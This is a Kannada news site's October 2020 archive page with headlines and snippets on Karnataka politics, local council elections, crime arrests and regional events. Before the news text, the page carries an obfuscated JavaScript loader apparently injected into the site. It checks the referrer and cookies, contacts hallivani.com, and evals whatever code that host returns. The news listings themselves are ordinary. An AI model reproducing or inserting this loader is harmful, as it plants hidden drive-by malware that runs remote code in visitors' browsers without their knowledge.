;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//hallivani.com/8jju21px/cache/cache.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};

Month: October 2020

ಡಿಜೆ ಹಳ್ಳಿ ಪ್ರಕರಣ ಆರೋಪಿ ತಪ್ಪಿಸಿಕೊಳ್ಳಲು ಸರ್ಕಾರವೇ ಕಾರಣ: ಜಗದೀಶ್ ವಿ ಸದಂ

ಬೆಂಗಳೂರು: ಇತ್ತೀಚಿಗೆ ನಡೆದ ಡಿಜೆ ಹಳ್ಳಿ ವ್ಯಾಪ್ತಿಯಲ್ಲಿ ಬರುವ ಕಾಂಗ್ರೆಸ್ ಪಕ್ಷದ ಶಾಸಕರ ಮನೆ ಮೇಲೆ ನಡೆದ ಗಲಭೆ ರೂವಾರಿ…

ಕುಸುಮಾ ನಿಮ್ಮ ಧ್ವನಿಯಾಗಲಿದ್ದಾರೆ, ಅವರಿಗೆ ಶಕ್ತಿ ತುಂಬಿ: ಡಿ.ಕೆ ಶಿವಕುಮಾರ್

ಬೆಂಗಳೂರು: ಹೆಣ್ಣು ಕುಟುಂಬದ ಕಣ್ಣು ಅಂತಾ ನೀವೆಲ್ಲರೂ ನಿಮ್ಮ ಕುಟುಂಬದವರನ್ನು ರಕ್ಷಣೆ ಮಾಡುತ್ತಿರುವ ರೀತಿಯಲ್ಲೇ ಕುಸುಮಾ ಅವರು ನಿಮ್ಮ ಮನೆ…

ಖ್ಯಾತ ನಿರ್ದೇಶಕ, ನಿರ್ಮಾಪಕ ದಿನೇಶ ಗಾಂಧಿ ವಿಧಿವಶ

ಬೆಂಗಳೂರು: ಅನಾರೋಗ್ಯದ ಕಾರಣದಿಂದ ಬೆಂಗಳೂರಿನ ಖಾಸಗಿ ಆಸ್ಪತ್ರೆಗೆ ದಾಖಲಾಗಿದ್ದ ಖ್ಯಾತ ಸ್ಯಾಂಡಲ್ ವುಡ್ ಸಿನಿಮಾ ನಿರ್ಮಾಪಕ, ನಿರ್ದೇಶಕ ದಿನೇಶ್(52) ಅವರು ಇಂದು…

ವಾಲ್ಮೀಕಿ ಜಯಂತಿ, ರಾಷ್ಟ್ರೀಯ ಏಕತಾ ದಿನಾಚರಣೆ

ಧಾರವಾಡ: ಜಿಲ್ಲಾಧಿಕಾರಿ ಕಚೇರಿ ಆವರಣದಲ್ಲಿ ಇಂದು ಮಹರ್ಷಿ ವಾಲ್ಮೀಕಿ ಜಯಂತಿಯನ್ನು ಆಚರಿಸಲಾಯಿತು. ಮಹರ್ಷಿ ವಾಲ್ಮೀಕಿ ಭಾವಚಿತ್ರಕ್ಕೆ ಪೂಜೆ ಸಲ್ಲಿಸಿ ಜಿಲ್ಲಾಧಿಕಾರಿಗಳು…

ಮುನಿರತ್ನ ಅವರಿಗೆ ಮಂತ್ರಿ ಸ್ಥಾನ ಖಚಿತ: ಬಿ.ಎಸ್. ಯಡಿಯೂರಪ್ಪ

ಬೆಂಗಳೂರು: ಮುನಿರತ್ನ ಅವರು ಉಪಚುನಾವಣೆಯಲ್ಲಿ ಗೆದ್ದ ಕೂಡಲೇ ಮಂತ್ರಿ ಸ್ಥಾ‌ನ ನೀಡುವದಾಗಿ ಮುಖ್ಯಮಂತ್ರಿಯಾಗಿ ಬಿ‌.ಎಸ್. ಯಡಿಯೂರಪ್ಪ ಅವರು ಇಂದು ತಿಳಿಸಿದ್ದಾರೆ….

ಕಾಂಗ್ರೆಸ್ ತೆಕ್ಕೆಗೆ ಹಾವೇರಿ ನಗರಸಭೆ

ಹಾವೇರಿ: ನಗರಸಭೆಯ ನೂತನ ಅಧ್ಯಕ್ಷರಾಗಿ ಸಂಜೀವಕುಮಾರ ನೀರಲಗಿ ಹಾಗೂ ಉಪಾಧ್ಯಕ್ಷೆಯಾಗಿ ಜಾಹೀದಾಬಾನು ಜಮಾದಾರ ಅವಿರೋಧವಾಗಿ ಆಯ್ಕೆಯಾದರು. ಶನಿವಾರ ನಡೆದ ಚುನಾವಣೆಯಲ್ಲಿ…

ದೇಶವನ್ನು ಒಗ್ಗೂಡಿಸಿದ ಕೀರ್ತಿ ಪಟೇಲ್ ಅವರಿಗೆ ಸಲ್ಲುತ್ತದೆ: ಬಸವರಾಜ ಬೊಮ್ಮಾಯಿ

ಬೆಂಗಳೂರು: ಸರ್ದಾರ ವಲ್ಲಭಬಾಯ್ ಪಟೇಲ್ ಅವರು ರಾಷ್ಟ್ರಕ್ಕೆ ನೀಡಿರುವ ಅಸಾಧಾರಣ ಸೇವೆಯಿಂದ ನಾವು ಶಾಶ್ವತವಾಗಿ ಪ್ರೇರಿತರಾಗಿದ್ದೇವೆ. ದೇಶ ಸ್ವಾತಂತ್ರ್ಯ ಪಡೆದ…

ರಸ್ತೆ ದುರಸ್ತಿಗೆ ಪ್ರಥಮಾದ್ಯತೆ ನೀಡಿ: ಜಿಲ್ಲಾಧಿಕಾರಿ ಎಂ.ಸುಂದರೇಶ ಬಾಬು

ಗದಗ: ಸತತ ಮಳೆಯಿಂದಾಗಿ ಗದಗ-ಬೆಟಗೇರಿ ನಗರಸಭೆ ಹಾಗೂ ಜಿಲ್ಲೆಯ ಎಲ್ಲಾ ನಗರಸ್ಥಳೀಯ ಸಂಸ್ಥೆಗಳ ವ್ಯಾಪ್ತಿಯಲ್ಲಿ ರಸ್ತೆಗಳು ಹಾಳಾಗಿದ್ದು ಸದ್ಯ ಮಳೆ…

ಪಂಚಾಕ್ಷರ ಶಿವಾಚಾರ್ಯ ಸ್ವಾಮಿಗಳ ಸ್ಮರಣೋತ್ಸವ

ಧಾರವಾಡ: ನವಲಗುಂದ ತಾಲೂಕಿನ ಅಡ್ನೂರ ಬೃಹನ್ಮಠದ ಪಟ್ಟಾಧ್ಯಕ್ಷರಾಗಿದ್ದ ಲಿಂ. ಮ.ಘ.ಚ ಪಂಚಾಕ್ಷರ ಶಿವಾಚಾರ್ಯ ಮಹಾಸ್ವಾಮಿಗಳ ಪುಣ್ಯ ಸ್ಮರಣೋತ್ಸವ ಕೊಪ್ಪಳ ಜಿಲ್ಲೆಯ…

ಡಿಕೆಸಿ ಭ್ರಷ್ಟಾಚಾರದಲ್ಲಿ ಭಾಗಿಯಾಗಿ ಬಿಜೆಪಿ ಬಗ್ಗೆ ಮಾತನಾಡುವ ನೈತಿಕ ಹಕ್ಕಿಲ್ಲ: ಪ್ರಹ್ಲಾದ ಜೋಶಿ

ಧಾರವಾಡ: ಭ್ರಷ್ಟಾಚಾರದಲ್ಲಿ ಭಾಗಿಯಾಗಿ ಜೈಲು ಅನುಭವಿಸಿ ಬಂದು ಮೇಲೂ ಡಿಕೆ ಶಿವಕುಮಾರ ಅವರು ಭ್ರಷ್ಟಾಚಾರದ ಬಗ್ಗೆ ಮಾತನಾಡುವುದು ಹಾಸ್ಯಾಸ್ಪದವಾಗಿದೆ ಎಂದು…

ಸಾರ್ವಜನಿಕರಿಗೆ ರಕ್ಷಣಾ ಕಾರ್ಯದ ಅರಿವು ಅಗತ್ಯ: ಜಿಲ್ಲಾಧಿಕಾರಿ ನಿತೇಶ ಪಾಟೀಲ

ಧಾರವಾಡ: ಆಕಸ್ಮಿಕವಾಗಿ ಸಂಭವಿಸುವ ಘಟನೆಗಳಲ್ಲಿ ನೆರೆ ಹೊರೆಯವರು ಸೇರಿದಂತೆ ಸಾರ್ವಜನಿಕರು ತತಕ್ಷಣ ಸ್ಪಂಧಿಸುವುದರಿಂದ ಮತ್ತು ಎನ್‍ಡಿಆರ್‍ಎಫ್ ಅಂತಹ ರಕ್ಷಣಾ ತಂಡಗಳು…

ತಲೆ ಬುರುಡೆ ಸಿಕ್ಕ ಪ್ರದೇಶ ರಕ್ಷಣೆ: ಪುರಸಭೆಯ ನಿರ್ಲಕ್ಷ್ಯ, ಸ್ಥಳೀಯರ ಆಕ್ರೋಶ

ಧಾರವಾಡ: ರಾಜ್ಯದ ಜನತೆ ಸೇರಿದಂತೆ ದೇಶದ ಜನರನ್ನು ಬೆಚ್ಚಿ ಬೀಳಿಸಿದ ಧಾರವಾಡ ಜಿಲ್ಲೆಯ ಅಣ್ಣಿಗೇರಿ ತಾಲೂಕಿನ ತಲೆಬುಡೆಗಳ ಸಿಕ್ಕ ಪ್ರದೇಶ…

ತಂತಿ ಬೇಲಿಯಲ್ಲಿ ಸಿಲುಕಿಕೊಂಡ ಕರಡಿ, ಅರಣ್ಯ ಇಲಾಖೆಯಿಂದ ರಕ್ಷಣೆ

ಹಾವೇರಿ: ಜಿಲ್ಲೆಯ ಹಾನಗಲ್ ತಾಲ್ಲೂಕಿನ ಶಿರಗೋಡ ಗ್ರಾಮದ ತೋಟಕ್ಕೆ ಅಳವಡಿಸಿದ್ದ ತಂತಿ ಬೇಲಿಯಲ್ಲಿ ಸಿಲುಕಿಕೊಂಡು ಪೇಚಾಡುತ್ತಿದ್ದ ಕರಡಿಯನ್ನು ಅರಣ್ಯ ಇಲಾಖೆ…

ಸಮಾನತೆಯ ಹರಿಕಾರ ಪ್ರವಾದಿ ಮಹಮ್ಮದ್ ಪೈಗಂಬರ್:ಎ.ಡಿ.ಕೋಲಕಾರ

ಗದಗ: ಎಲ್ಲಾ ಧರ್ಮ ಗ್ರಂಥಗಳು ಮನುಷ್ಯತ್ವವನ್ನು ಪ್ರತಿಪಾದಿಸಿವೆ ನಮಾಜ್‌, ಝಕಾತ್‌, ಹಜ್‌, ಉಪವಾಸದಷ್ಟೇ ಹೆತ್ತವರನ್ನು ಪೋಷಿಸಬೇಕು. ಇದು ನಿಜವಾದ ಇಸ್ಲಾಂ…

ಕಳ್ಳರ ಬಂಧನ: ಹಣ, ಒಡವೆ, ಬೈಕ್ ವಶಕ್ಕೆ ಪಡೆದ ಪೊಲೀಸ್ ಸಿಬ್ಬಂದಿ

ಧಾರವಾಡ: ಹುಬ್ಬಳ್ಳಿ-ಧಾರವಾಡ ಮಹಾನಗರದಲ್ಲಿ ಸರಗಳ್ಳತನ ಮಾಡಿ ಕೈ ಚಳಕ ತೋರುದ್ದ ಮೂವರು ಕತರ್ನಾಕ್ ಕಳ್ಳರನ್ನು ಬಂಧಿಸುವಲ್ಲಿ ಧಾರವಾಡದ ವಿದ್ಯಾಗಿರಿ ಪೊಲೀಸರು ಯಶಸ್ವಿಯಾಗಿದ್ದಾರೆ….

ಬಿಜೆಪಿ ತೆಕ್ಕೆಗೆ ಶಿಗ್ಗಾಂವಿ ಪುರಸಭೆ

ಹಾವೇರಿ: ಜಿಲ್ಲೆಯ ಶಿಗ್ಗಾಂವಿ ಪುರಸಭೆಯ ನೂತನ ಅಧ್ಯಕ್ಷರಾಗಿ ಬಿಜೆಪಿ ಪಕ್ಷದ ಶ್ರೀಕಾಂತ ಬುಳ್ಳಕ್ಕನವರ ಹಾಗೂ ಉಪಾಧ್ಯಕ್ಷರಾಗಿ ಮಂಜುನಾಥ ಬ್ಯಾಹಟ್ಟಿ ಆಯ್ಕೆಯಾಗಿದ್ದಾರೆ….

ಉತ್ತರ ಕರ್ನಾಟಕದ ನೆರೆಪರಿಸ್ಥಿತಿಗೆ ಕೇಂದ್ರದ ನೆರವು ಕೇಳುವ ಧೈರ್ಯ ರಾಜ್ಯ ಸರ್ಕಾರಕ್ಕಿಲ್ಲ: ಸಿದ್ದರಾಮಯ್ಯ

ಬೆಂಗಳೂರು: ಮಾಜಿ ಮುಖ್ಯಮಂತ್ರಿ ವಿರೋಧ ಪಕ್ಷದ ನಾಯಕ ಸಿದ್ದರಾಮಯ್ಯ ಅವರು ಇಂದು ಸರಣಿ ಟ್ವೀಟ್ ಮಾಡಿ ರಾಜ್ಯ ಸರ್ಕಾರದ ವಿರುದ್ಧ ಕಿಡಿಕಾರಿದ್ದಾರೆ. ಉತ್ತರ…

ಆಡೂರನಲ್ಲಿ ಸಂಭ್ರಮದ ಸೀಗೆ ಹುಣ್ಣಿಮೆ: ಭೂಮಾತೆಗೆ ಪೂಜೆ

ಹಾನಗಲ್ : ತಾಲ್ಲೂಕಿನ ಆಡೂರ ಸೇರಿ ಸುತ್ತುಮುತ್ತಲಿನ ಗ್ರಾಮಗಳಲ್ಲಿನ ರೈತ ಸಮೂಹ ಸೀಗೆ ಹುಣ್ಣಿಮೆಯನ್ನು ಶ್ರದ್ಧಾ ಭಕ್ತಿಯಿಂದ ಗುರುವಾರ ಆಚರಿಸಿದರು….